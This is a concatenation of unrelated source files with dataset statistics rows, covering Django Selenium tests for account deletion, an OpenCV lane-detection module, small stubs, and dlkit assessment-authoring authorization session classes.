assert account_foo_external.external_id is None
def test_transactions_disconnected(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
transaction_foo_external: Transaction,
remove_temporary_customers: Callable[[], Iterable[None]],
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
create_customer_in_saltedge(profile_foo, customers_api())
self.disable_external_synchronization(selenium, live_server_path, profile_foo)
transaction_foo_external.refresh_from_db()
assert transaction_foo_external.external_id is None
def disable_external_synchronization(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
profile: Profile,
) -> None:
url = live_server_path(reverse("profile_disconnect"))
selenium.get(url)
selenium.find_element_by_xpath('//button[@type="submit"]').click()
profile.refresh_from_db()
class TestUserDelete:
def test_user_is_deleted(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
user_foo: User,
) -> None:
selenium = authenticate_selenium(user=user_foo)
self.delete_user(selenium, live_server_path, user_foo)
assert not User.objects.filter(pk=user_foo.pk).exists()
def test_profile_is_deleted(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
user_foo: User,
) -> None:
selenium = authenticate_selenium(user=user_foo)
self.delete_user(selenium, live_server_path, user_foo)
assert not Profile.objects.filter(pk=user_foo.profile.pk).exists()
def test_redirect(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
user_foo: User,
) -> None:
selenium = authenticate_selenium(user=user_foo)
self.delete_user(selenium, live_server_path, user_foo)
assert selenium.current_url == live_server_path(reverse("login"))
def test_message(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
user_foo: User,
) -> None:
selenium = authenticate_selenium(user=user_foo)
self.delete_user(selenium, live_server_path, user_foo)
messages = [
m.text
for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
]
assert any("User was deleted successfully" in message for message in messages)
def test_connections_are_deleted(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
user_foo: User,
connection_foo: Connection,
) -> None:
selenium = authenticate_selenium(user=user_foo)
self.delete_user(selenium, live_server_path, user_foo)
assert not Connection.objects.filter(user=user_foo).count() == 0
def test_accounts_are_deleted(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
user_foo: User,
account_foo: Account,
) -> None:
selenium = authenticate_selenium(user=user_foo)
self.delete_user(selenium, live_server_path, user_foo)
assert Account.objects.filter(user=user_foo).count() == 0
def test_transactions_are_deleted(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
user_foo: User,
transaction_foo: Transaction,
) -> None:
selenium = authenticate_selenium(user=user_foo)
self.delete_user(selenium, live_server_path, user_foo)
assert Transaction.objects.filter(user=user_foo).count() == 0
def test_customer_is_deleted(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
user_foo: User,
remove_temporary_customers: Callable[[], Iterable[None]],
) -> None:
api = customers_api()
create_customer_in_saltedge(user_foo.profile, api)
selenium = authenticate_selenium(user=user_foo)
assert api.customers_customer_id_get(user_foo.profile.external_id)
self.delete_user(selenium, live_server_path, user_foo)
with pytest.raises(ApiException) as e:
api.customers_customer_id_get(user_foo.profile.external_id)
assert "CustomerNotFound" in str(e.value)
def delete_user(
self, selenium: WebDriver, live_server_path: Callable[[str], str], user: User,
) -> None:
url = live_server_path(reverse("user_delete"))
selenium.get(url)
selenium.find_element_by_xpath('//button[@type="submit"]').click()
| 38.259362
| 116
| 0.65735
| 3,137
| 27,585
| 5.473701
| 0.073956
| 0.069303
| 0.097024
| 0.068313
| 0.829072
| 0.811484
| 0.794421
| 0.761691
| 0.742764
| 0.714402
| 0
| 0.001911
| 0.241291
| 27,585
| 720
| 117
| 38.3125
| 0.818529
| 0.003698
| 0
| 0.70092
| 0
| 0
| 0.078745
| 0.015793
| 0
| 0
| 0
| 0
| 0.087423
| 1
| 0.082822
| false
| 0.069018
| 0.019939
| 0
| 0.116564
| 0.003067
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ff442c57f2a6bb95049fa3ade55ce030d5247ec1
| 9,487
|
py
|
Python
|
YOLO/line_object.py
|
qjadud1994/Alpha-Car
|
4a08890fa67ad0358124df45f49d3e0d109487d8
|
[
"MIT"
] | 16
|
2018-06-07T07:15:55.000Z
|
2021-07-18T08:26:58.000Z
|
YOLO/line_object.py
|
qjadud1994/Alpha-Car
|
4a08890fa67ad0358124df45f49d3e0d109487d8
|
[
"MIT"
] | 7
|
2019-04-18T12:02:04.000Z
|
2020-06-01T16:20:59.000Z
|
YOLO/line_object.py
|
qjadud1994/Alpha-Car
|
4a08890fa67ad0358124df45f49d3e0d109487d8
|
[
"MIT"
] | 10
|
2019-02-01T11:01:00.000Z
|
2021-09-11T14:48:36.000Z
|
import cv2
import numpy as np
import time
global lx1, lx2, ly1, ly2, gx1, gx2, gy1, gy2, warped_eq1
lx1, lx2, ly1, ly2, gx1, gy1, gx2, gy2 = int(0), int(0), int(0), int(0),int(0), int(0), int(0), int(0)
# Frame width & Height
w = 800
h = 600
def ROI(img, vertices, color3=(255, 255, 255), color1=255):
mask = np.zeros_like(img)
if len(img.shape) > 2:
color = color3
else:
color = color1
cv2.fillPoly(mask, vertices, color)
ROI_image = cv2.bitwise_and(img, mask)
return ROI_image
def get_fitline_left(img, f_lines):
global lx1, lx2, ly1, ly2
lines = f_lines.reshape(f_lines.shape[0] * 2, 2)
vx, vy, x, y = cv2.fitLine(lines, cv2.DIST_L2, 0, 0.01, 0.01)
if lines.shape[0] != 0:
x1, y1 = int(((img.shape[0] - 1) - y) / vy * vx + x), img.shape[0] - 1
x2, y2 = int(((img.shape[0] / 2 + 100) - y) / vy * vx + x), int(img.shape[0] / 2 + 100)
lx1, ly1, lx2, ly2 = x1, y1, x2, y2
else:
if lx1 == 0 and lx2 == 0 and ly1 == 0 and ly2 == 0:
x1, y1 = img.shape[1] / 2, img.shape[0] / 2
x2, y2 = img.shape[1] / 2, img.shape[0] / 2
else:
x1, y1, x2, y2 = lx1, ly1, lx2, ly2
result = [x1, y1, x2, y2, (x1 + x2) / 2, (y1 + y2) / 2]
return result
def get_fitline_right(img, f_lines):
global gx1, gx2, gy1, gy2
lines = f_lines.reshape(f_lines.shape[0] * 2, 2)
vx, vy, x, y = cv2.fitLine(lines, cv2.DIST_L2, 0, 0.01, 0.01)
if lines.shape[0] != 0:
x1, y1 = int(((img.shape[0] - 1) - y) / vy * vx + x), img.shape[0] - 1
x2, y2 = int(((img.shape[0] / 2 + 100) - y) / vy * vx + x), int(img.shape[0] / 2 + 100)
gx1, gy1, gx2, gy2 = x1, y1, x2, y2
else:
if gx1 == 0 and gx2 == 0 and gy1 == 0 and gy2 == 0:
x1, y1 = img.shape[1] / 2, img.shape[0] / 2
x2, y2 = img.shape[1] / 2, img.shape[0] / 2
else:
x1, y1, x2, y2 = gx1, gy1, gx2, gy2
result = [x1, y1, x2, y2, (x1 + x2) / 2, (y1 + y2) / 2]
return result
def draw(img, lines):
cv2.line(img, (lines[0], lines[1]), (lines[2], lines[3]), (0, 0, 255), 6)
def get_lane(img):
global line
height, weight = img.shape[:2]
#canny_img = cv2.Canny(img, 550, 600)#black, white
canny_img = cv2.Canny(img, 250, 300) # black, white
#cv2.imshow("canny", canny_img)
#vertices = np.array([[(0, height), (270, height / 2), (weight - 270, height / 2), (weight, height)]],
# dtype=np.int32)
vertices = np.array([[(0, height), (0, height * 2 / 3), (weight, height * 2 / 3), (weight, height)]],
dtype=np.int32)
ROI_img = ROI(canny_img, vertices)
#cv2.imshow('roi', ROI_img)
#img = cv2.polylines(img, vertices, True, (255, 0 ,0), 5)
line_arr = cv2.HoughLinesP(ROI_img, 1, np.pi / 180, 50, minLineLength=10, maxLineGap=50)
if type(line_arr).__name__ == 'NoneType':
line_arr = line
elif line_arr.shape[0] != 1:
line_arr = np.squeeze(line_arr)
line = line_arr
elif line_arr.shape[0] == 1:
line_arr = np.squeeze(line_arr, axis=1)
line = line_arr
slope_degree = (np.arctan2(line_arr[:, 1] - line_arr[:, 3], line_arr[:, 0] - line_arr[:, 2]) * 180) / np.pi
line_arr1,line_arr2,slope_degree1,slope_degree2 = line_arr,line_arr,slope_degree,slope_degree
line_arr1 = line_arr1[np.abs(slope_degree1) < 180]
slope_degree1 = slope_degree1[np.abs(slope_degree1) < 180]
line_arr1 = line_arr1[np.abs(slope_degree1) > 90]
slope_degree1 = slope_degree1[np.abs(slope_degree1) >90]
line_arr2 = line_arr2[np.abs(slope_degree2) > 0]
slope_degree2 = slope_degree2[np.abs(slope_degree2) > 0]
line_arr2 = line_arr2[np.abs(slope_degree2) < 90]
slope_degree2 = slope_degree2[np.abs(slope_degree2) < 90]
if line_arr1.shape[0]!=0 and line_arr2.shape[0]!=0:
line_arr = np.concatenate((line_arr1,line_arr1),axis=0)
slope_degree = np.concatenate((slope_degree2,slope_degree1),axis=0)
elif line_arr1.shape[0]!=0 and line_arr2.shape[0]==0:
line_arr = line_arr1
slope_degree = slope_degree1
elif line_arr1.shape[0]==0 and line_arr2.shape[0]!=0:
line_arr = line_arr2
slope_degree = slope_degree2
else:
line_arr = line_arr[np.abs(slope_degree) < 160]
slope_degree = slope_degree[np.abs(slope_degree) < 160]
line_arr = line_arr[np.abs(slope_degree) >30]
slope_degree = slope_degree[np.abs(slope_degree)>30]
L_lines, R_lines = line_arr[(slope_degree > 0), :], line_arr[(slope_degree < 0), :]
if L_lines.shape[0]!=0 and R_lines.shape[0]==0:
vertices = np.array([[(0, height), (0, height * 4 / 5), (weight/2, height * 4 / 5), (weight/2, height)]],
dtype=np.int32)
ROI_img = ROI(canny_img, vertices)
line_arr = cv2.HoughLinesP(ROI_img, 1, np.pi / 180, 50, minLineLength=10, maxLineGap=50)
if type(line_arr).__name__ == 'NoneType':
line_arr = line
elif line_arr.shape[0] != 1:
line_arr = np.squeeze(line_arr)
line = line_arr
elif line_arr.shape[0] == 1:
line_arr = np.squeeze(line_arr, axis=1)
line = line_arr
slope_degree = (np.arctan2(line_arr[:, 1] - line_arr[:, 3], line_arr[:, 0] - line_arr[:, 2]) * 180) / np.pi
line_arr1, line_arr2, slope_degree1, slope_degree2 = line_arr, line_arr, slope_degree, slope_degree
line_arr1 = line_arr1[np.abs(slope_degree1) < 160]
slope_degree1 = slope_degree1[np.abs(slope_degree1) < 160]
line_arr1 = line_arr1[np.abs(slope_degree1) > 90]
slope_degree1 = slope_degree1[np.abs(slope_degree1) > 90]
line_arr2 = line_arr2[np.abs(slope_degree2) > 30]
slope_degree2 = slope_degree2[np.abs(slope_degree2) > 30]
line_arr2 = line_arr2[np.abs(slope_degree2) < 90]
slope_degree2 = slope_degree2[np.abs(slope_degree2) < 90]
if line_arr1.shape[0] != 0 and line_arr2.shape[0] != 0:
line_arr = np.concatenate((line_arr1, line_arr1), axis=0)
slope_degree = np.concatenate((slope_degree2, slope_degree1), axis=0)
elif line_arr1.shape[0] != 0 and line_arr2.shape[0] == 0:
line_arr = line_arr1
slope_degree = slope_degree1
elif line_arr1.shape[0] == 0 and line_arr2.shape[0] != 0:
line_arr = line_arr2
slope_degree = slope_degree2
else:
line_arr = line_arr[np.abs(slope_degree) < 160]
slope_degree = slope_degree[np.abs(slope_degree) < 160]
line_arr = line_arr[np.abs(slope_degree) > 30]
slope_degree = slope_degree[np.abs(slope_degree) > 30]
L_lines, R_lines = line_arr[(slope_degree > 0), :], np.array([[weight,height, weight, height*0.7]])
elif L_lines.shape[0]==0 and R_lines.shape[0]!=0:
vertices = np.array([[(weight/2, height), (weight/2, height * 4 / 5), (weight, height * 4 / 5), (weight, height)]],
dtype=np.int32)
ROI_img = ROI(canny_img, vertices)
line_arr = cv2.HoughLinesP(ROI_img, 1, np.pi / 180, 50, minLineLength=10, maxLineGap=50)
if type(line_arr).__name__ == 'NoneType':
line_arr = line
elif line_arr.shape[0] != 1:
line_arr = np.squeeze(line_arr)
line = line_arr
elif line_arr.shape[0] == 1:
line_arr = np.squeeze(line_arr, axis=1)
line = line_arr
slope_degree = (np.arctan2(line_arr[:, 1] - line_arr[:, 3], line_arr[:, 0] - line_arr[:, 2]) * 180) / np.pi
line_arr1, line_arr2, slope_degree1, slope_degree2 = line_arr, line_arr, slope_degree, slope_degree
line_arr1 = line_arr1[np.abs(slope_degree1) < 160]
slope_degree1 = slope_degree1[np.abs(slope_degree1) < 160]
line_arr1 = line_arr1[np.abs(slope_degree1) > 90]
slope_degree1 = slope_degree1[np.abs(slope_degree1) > 90]
line_arr2 = line_arr2[np.abs(slope_degree2) > 30]
slope_degree2 = slope_degree2[np.abs(slope_degree2) > 30]
line_arr2 = line_arr2[np.abs(slope_degree2) < 90]
slope_degree2 = slope_degree2[np.abs(slope_degree2) < 90]
if line_arr1.shape[0] != 0 and line_arr2.shape[0] != 0:
line_arr = np.concatenate((line_arr1, line_arr1), axis=0)
slope_degree = np.concatenate((slope_degree2, slope_degree1), axis=0)
elif line_arr1.shape[0] != 0 and line_arr2.shape[0] == 0:
line_arr = line_arr1
slope_degree = slope_degree1
elif line_arr1.shape[0] == 0 and line_arr2.shape[0] != 0:
line_arr = line_arr2
slope_degree = slope_degree2
else:
line_arr = line_arr[np.abs(slope_degree) < 160]
slope_degree = slope_degree[np.abs(slope_degree) < 160]
line_arr = line_arr[np.abs(slope_degree) > 30]
slope_degree = slope_degree[np.abs(slope_degree) > 30]
L_lines, R_lines = np.array([[0, height, 0, height*0.7]]), line_arr[(slope_degree < 0), :]
temp = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
left_fit_line = get_fitline_left(img, L_lines)
right_fit_line = get_fitline_right(img, R_lines)
draw(img, right_fit_line[:4])
draw(img, left_fit_line[:4])
result = cv2.addWeighted(img, 1, temp, 1, 0)
return result, left_fit_line[:4], right_fit_line[:4]
| 40.370213
| 123
| 0.599346
| 1,476
| 9,487
| 3.636179
| 0.082656
| 0.099124
| 0.067077
| 0.03801
| 0.828582
| 0.789827
| 0.772312
| 0.7643
| 0.749022
| 0.749022
| 0
| 0.090652
| 0.254664
| 9,487
| 234
| 124
| 40.542735
| 0.668364
| 0.034679
| 0
| 0.712644
| 0
| 0
| 0.002624
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028736
| false
| 0
| 0.017241
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ffb3512d151b9fcc9a8285a364d3a620ade63ebb
| 180
|
py
|
Python
|
akeydo/plugins/cpu/drivers/cgroup.py
|
dangle/vfio-kvm
|
13ed6f6b2ebbc2e23afe267866e321a2fd51a337
|
[
"MIT"
] | 30
|
2021-01-15T18:22:26.000Z
|
2021-06-02T14:10:40.000Z
|
akeydo/plugins/cpu/drivers/cgroup.py
|
dangle/vfio-kvm
|
13ed6f6b2ebbc2e23afe267866e321a2fd51a337
|
[
"MIT"
] | 11
|
2021-01-23T05:37:06.000Z
|
2021-04-21T21:50:37.000Z
|
akeydo/plugins/cpu/drivers/cgroup.py
|
dangle/vfio-kvm
|
13ed6f6b2ebbc2e23afe267866e321a2fd51a337
|
[
"MIT"
] | null | null | null |
class Driver:
def __init__(self, cores: int) -> None:
self._cores = cores
def shield_cpu(self, *cpu):
pass
def unshield_cpu(self, *cpu):
pass
| 18
| 43
| 0.572222
| 23
| 180
| 4.173913
| 0.521739
| 0.1875
| 0.208333
| 0.291667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.316667
| 180
| 9
| 44
| 20
| 0.780488
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0.285714
| 0
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
4420e9ac062cb8a20b6cb977ff7557e2369ab33e
| 47
|
py
|
Python
|
ovhapi/__init__.py
|
surycat/ovhapi
|
a8b36acbbdafe7137817f2175a27553b6f212f00
|
[
"BSD-3-Clause"
] | 1
|
2020-08-17T18:02:15.000Z
|
2020-08-17T18:02:15.000Z
|
ovhapi/__init__.py
|
surycat/ovhapi
|
a8b36acbbdafe7137817f2175a27553b6f212f00
|
[
"BSD-3-Clause"
] | null | null | null |
ovhapi/__init__.py
|
surycat/ovhapi
|
a8b36acbbdafe7137817f2175a27553b6f212f00
|
[
"BSD-3-Clause"
] | null | null | null |
from OvhApi import Api, OVH_API_EU, OVH_API_CA
| 23.5
| 46
| 0.829787
| 10
| 47
| 3.5
| 0.7
| 0.342857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12766
| 47
| 1
| 47
| 47
| 0.853659
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4443e3310beae2eb4700f021259257a31ad32846
| 117,410
|
py
|
Python
|
dlkit/authz_adapter/assessment_authoring/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/authz_adapter/assessment_authoring/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/authz_adapter/assessment_authoring/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""AuthZ Adapter implementations of assessment.authoring sessions."""
# pylint: disable=no-init
# Numerous classes don't require __init__.
# pylint: disable=too-many-public-methods
# Number of methods are defined in specification
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
from ..osid import sessions as osid_sessions
from ..osid.osid_errors import NotFound
from ..osid.osid_errors import PermissionDenied, NullArgument, Unimplemented
from ..osid.osid_errors import Unsupported
from ..primitives import Id
from ..utilities import QueryWrapper
from ..utilities import raise_null_argument
from dlkit.abstract_osid.assessment_authoring import sessions as abc_assessment_authoring_sessions
class AssessmentPartLookupSession(abc_assessment_authoring_sessions.AssessmentPartLookupSession, osid_sessions.OsidSession):
"""Adapts underlying AssessmentPartLookupSession methodswith authorization checks."""
def __init__(self, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = self._provider_session.get_bank_id()
self._id_namespace = 'assessment_authoring.AssessmentPart'
self.use_federated_bank_view()
self.use_comparative_assessment_part_view()
self._auth_bank_ids = None
self._unauth_bank_ids = None
# self._overriding_bank_ids = None
#
# def _get_overriding_bank_ids(self):
# if self._overriding_bank_ids is None:
# self._overriding_bank_ids = self._get_overriding_catalog_ids('lookup')
# return self._overriding_bank_ids
def _try_overriding_banks(self, query):
if self._get_overriding_catalog_ids('lookup') is not None:
for catalog_id in self._get_overriding_catalog_ids('lookup'):
query.match_bank_id(catalog_id, match=True)
return self._query_session.get_assessment_parts_by_query(query), query
def _get_unauth_bank_ids(self, bank_id):
if self._can('lookup', bank_id):
return [] # Don't go further - assumes authorizations inherited
else:
unauth_list = [str(bank_id)]
if self._hierarchy_session.has_child_banks(bank_id):
for child_bank_id in self._hierarchy_session.get_child_bank_ids(bank_id):
unauth_list = unauth_list + self._get_unauth_bank_ids(child_bank_id)
return unauth_list
def _try_harder(self, query):
results, query = self._try_overriding_banks(query)
if self._is_isolated_catalog_view():
if results.available() or self._is_comparative_object_view():
return results
if self._is_plenary_object_view():
return results
if self._hierarchy_session is None or self._query_session is None:
return results
if self._unauth_bank_ids is None:
self._unauth_bank_ids = self._get_unauth_bank_ids(self._qualifier_id)
for bank_id in self._unauth_bank_ids:
query.match_bank_id(bank_id, match=False)
return self._query_session.get_assessment_parts_by_query(query)
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_lookup_assessment_parts(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.can_lookup_resources_template
return (self._can('lookup') or
bool(self._get_overriding_catalog_ids('lookup')))
def use_comparative_assessment_part_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_comparative_resource_view_template
self._use_comparative_object_view()
self._provider_session.use_comparative_assessment_part_view()
def use_plenary_assessment_part_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_plenary_resource_view_template
self._use_plenary_object_view()
self._provider_session.use_plenary_assessment_part_view()
def use_federated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._use_federated_catalog_view()
self._provider_session.use_federated_bank_view()
if self._query_session:
self._query_session.use_federated_bank_view()
def use_isolated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._use_isolated_catalog_view()
self._provider_session.use_isolated_bank_view()
if self._query_session:
self._query_session.use_isolated_bank_view()
def use_active_assessment_part_view(self):
# Implemented from azosid template for -
# osid.composition.CompositionLookupSession.use_active_composition_view
return self._provider_session.use_active_assessment_part_view()
def use_any_status_assessment_part_view(self):
# Implemented from azosid template for -
# osid.composition.CompositionLookupSession.use_any_status_composition_view
return self._provider_session.use_any_status_assessment_part_view()
def use_sequestered_assessment_part_view(self):
# Implemented from azosid template for -
# osid.composition.CompositionLookupSession.use_sequestered_composition_view_template
return self._provider_session.use_sequestered_assessment_part_view()
def use_unsequestered_assessment_part_view(self):
# Implemented from azosid template for -
# osid.composition.CompositionLookupSession.use_unsequestered_composition_view_template
return self._provider_session.use_unsequestered_assessment_part_view()
@raise_null_argument
def get_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resource_template
if self._can('lookup'):
return self._provider_session.get_assessment_part(assessment_part_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_assessment_part_query()
query.match_id(assessment_part_id, match=True)
results = self._try_harder(query)
if results.available():
return results.next()
raise NotFound()
@raise_null_argument
def get_assessment_parts_by_ids(self, assessment_part_ids):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_ids_template
if self._can('lookup'):
return self._provider_session.get_assessment_parts_by_ids(assessment_part_ids)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_assessment_part_query()
for assessment_part_id in (assessment_part_ids):
query.match_id(assessment_part_id, match=True)
return self._try_harder(query)
@raise_null_argument
def get_assessment_parts_by_genus_type(self, assessment_part_genus_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_genus_type_template
if self._can('lookup'):
return self._provider_session.get_assessment_parts_by_genus_type(assessment_part_genus_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_assessment_part_query()
query.match_genus_type(assessment_part_genus_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_assessment_parts_by_parent_genus_type(self, assessment_genus_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_parent_genus_type_template
if self._can('lookup'):
return self._provider_session.get_assessment_parts_by_parent_genus_type(assessment_genus_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_assessment_part_query()
query.match_parent_genus_type(assessment_genus_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_assessment_parts_by_record_type(self, assessment_part_record_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_record_type_template
if self._can('lookup'):
return self._provider_session.get_assessment_parts_by_record_type(assessment_part_record_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_assessment_part_query()
query.match_record_type(assessment_part_record_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_assessment_parts_for_assessment(self, assessment_id):
# Implemented from azosid template for -
# osid.learning.ActivityLookupSession.get_activities_for_objective_template
if self._can('lookup'):
return self._provider_session.get_assessment_parts_for_assessment(assessment_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_assessment_part_query()
query.match_assessment_id(assessment_id, match=True)
return self._try_harder(query)
def get_assessment_parts(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_template
if self._can('lookup'):
return self._provider_session.get_assessment_parts()
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_assessment_part_query()
query.match_any(match=True)
return self._try_harder(query)
assessment_parts = property(fget=get_assessment_parts)
def get_assessment_parts_for_assessment_part(self, assessment_part_id):
# NOT CURRENTLY IN SPEC - Implemented from
# osid.assessment_authoring.AssessmentPartLookupSession.additional_methods
if self._can('lookup'):
return self._provider_session.get_assessment_parts_for_assessment_part(assessment_part_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_assessment_part_query()
query.match_assessment_part_id(assessment_part_id, match=True)
return self._try_harder(query)
class AssessmentPartQuerySession(abc_assessment_authoring_sessions.AssessmentPartQuerySession, osid_sessions.OsidSession):
"""Adapts underlying AssessmentPartQuerySession methodswith authorization checks."""
def __init__(self, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = self._provider_session.get_bank_id()
self._id_namespace = 'assessment_authoring.AssessmentPart'
self.use_federated_bank_view()
self._unauth_bank_ids = None
# self._overriding_bank_ids = None
# def _get_overriding_bank_ids(self):
# if self._overriding_bank_ids is None:
# self._overriding_bank_ids = self._get_overriding_catalog_ids('search')
# return self._overriding_bank_ids
def _try_overriding_banks(self, query):
if self._get_overriding_catalog_ids('search') is not None:
for bank_id in self._get_overriding_catalog_ids('search'):
query._provider_query.match_bank_id(bank_id, match=True)
return self._query_session.get_assessment_parts_by_query(query), query
def _get_unauth_bank_ids(self, bank_id):
if self._can('search', bank_id):
return [] # Don't go further - assumes authorizations inherited
else:
unauth_list = [str(bank_id)]
if self._hierarchy_session.has_child_banks(bank_id):
for child_bank_id in self._hierarchy_session.get_child_bank_ids(bank_id):
unauth_list = unauth_list + self._get_unauth_bank_ids(child_bank_id)
return unauth_list
def _try_harder(self, query):
results, query = self._try_overriding_banks(query)
if self._is_isolated_catalog_view():
if results.available():
return results
if self._hierarchy_session is None or self._query_session is None:
return results
if self._unauth_bank_ids is None:
self._unauth_bank_ids = self._get_unauth_bank_ids(self._qualifier_id)
for bank_id in self._unauth_bank_ids:
query._provider_query.match_bank_id(bank_id, match=False)
return self._query_session.get_assessment_parts_by_query(query)
class AssessmentPartQueryWrapper(QueryWrapper):
"""Wrapper for AssessmentPartQueries to override match_bank_id method"""
def match_bank_id(self, bank_id, match=True):
self._cat_id_args_list.append({'bank_id': bank_id, 'match': match})
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_search_assessment_parts(self):
# Implemented from azosid template for -
# osid.resource.ResourceQuerySession.can_search_resources_template
return (self._can('search') or
bool(self._get_overriding_catalog_ids('search')))
def use_federated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._use_federated_catalog_view()
self._provider_session.use_federated_bank_view()
if self._query_session:
self._query_session.use_federated_bank_view()
def use_isolated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._use_isolated_catalog_view()
self._provider_session.use_isolated_bank_view()
if self._query_session:
self._query_session.use_isolated_bank_view()
def use_sequestered_assessment_part_view(self):
# Implemented from azosid template for -
# osid.composition.CompositionLookupSession.use_sequestered_composition_view_template
return self._provider_session.use_sequestered_assessment_part_view()
def use_unsequestered_assessment_part_view(self):
# Implemented from azosid template for -
# osid.composition.CompositionLookupSession.use_unsequestered_composition_view_template
return self._provider_session.use_unsequestered_assessment_part_view()
def get_assessment_part_query(self):
# Implemented from azosid template for -
# osid.resource.ResourceQuerySession.get_resource_query_template
if (not self._can('search') and
self._is_isolated_catalog_view()):
raise PermissionDenied()
else:
return self.AssessmentPartQueryWrapper(self._provider_session.get_assessment_part_query())
assessment_part_query = property(fget=get_assessment_part_query)
@raise_null_argument
